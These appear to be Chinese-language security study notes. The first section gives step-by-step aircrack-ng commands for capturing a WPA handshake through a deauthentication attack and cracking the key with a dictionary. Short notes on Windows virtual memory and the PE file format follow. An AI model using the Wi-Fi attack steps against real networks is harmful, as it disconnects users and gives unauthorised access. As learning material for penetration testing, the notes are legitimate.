无线渗透实操——Aircrack-ng(WPA/WPS)

步骤

  • 启动monitor模式
    • airmon-ng start wlan0
  • 查看附近无线信息
    • airodump-ng wlan0mon
  • 开始抓包并保存
    • airodump-ng wlan0mon -c<channel> --bssid<bssid> -w<filename>
  • Deauthentication攻击获取四步握手信息
    • aireplay-ng -0 <count> -a <ap mac> -c <sta mac> wlan0mon
  • 字典暴破
    • aircrack-ng -w /user/share/john/password.list wpa-01.cap

虚拟内存

  • Windows的内存可以被分为两个层面:物理内存和虚拟内存。其中物理内存非常复杂,需要静茹Windows内核级别ring0才能看到。通常,在用户模式下,用调试器看到的内存地址都是虚拟内存。
  • 程序进行虚地址(逻辑地址)到实地址(物理地址)转换的过程称为程序的再定位。

PE

  • PE(Portable Executable)是Windows下可执行文件遵守的数据格式,如*.exe,*.dll
  • 除了二进制机器码,还包含了字符串,菜单,图标,位图,字体等。
  • 在程序被执行时,操作系统会按照PE文件格式的约定去相应的地方准确地定位各种类型的资源,并分别装入不同的区域。